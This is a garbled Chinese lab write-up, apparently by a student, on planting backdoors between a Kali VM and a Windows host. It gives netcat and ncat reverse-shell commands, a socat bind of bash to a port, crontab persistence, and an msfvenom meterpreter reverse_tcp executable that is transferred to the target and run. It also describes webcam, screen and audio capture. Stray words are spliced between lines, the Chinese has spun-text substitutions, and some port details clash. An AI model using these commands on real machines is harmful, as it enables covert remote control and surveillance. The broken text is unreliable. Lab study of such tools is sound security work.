从网络上下载来路不明的盗版软件、压缩包,还有一些小视频……linux
取得shell后远程直接执行后门这个可执行文件。shell
感受它超级强大……每一个功能都很让我印象深入!开摄像头,看界面,录音频……彻底没有任何隐私可言啊。windows
若是翻看任务管理器时,机器内存占用很是严重,关掉主要应用程序仍是有占用,任务里有并不认识的exe程序,那颇有可能就是被安装了后门。bash
由于我是win10系统,自己存在必定的坚固性,因此最后的提权暂时没作出来,准备以后本身再按个虚拟机或者借同窗的win7系统完善一下。网络
ncat
软件,我安装在了C盘根目录下了。ipconfig
和ifconfig
指令分别查看windows主机和kali虚拟机的ip地址。分别为kali:192.168.234.140
windows:172.30.0.152
ncat.exe -l -p 5316
监听nc 172.30.0.152 5316 -e /bin/sh
反弹链接windowswindows得到linux的shell
tcp
nc -l -p 5316
命令于5316端口进行监听ncat.exe -e cmd.exe 192.168.234.140 5316
命令经过5316端口反弹链接linux主机linux得到windows的shell
3d
crontab -e
命令修改用户的cron配置,弹出一个vi界面cron启动成功
code
socat tcp-listen:5316
把cmd绑定到端口5208socat tcp-l:5316 system:bash,pty,stderr
反弹链接socat readline tcp:192.168.234.140:5316
开启监听成功,用ls检验视频
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.140 LPORT=5316 -f exe >20145316.exe
来生成后门程序,而后发送到windows机中。ncat.exe -lv 5316 >20145316.exe
ncat -nv 172.30.0.152 5316 < 20145316.exe
传送后门程序监听开始,在windows双击20145316.exe运行后门程序,实现远程控制
blog
windows上任务管理器能够看到后门正在运行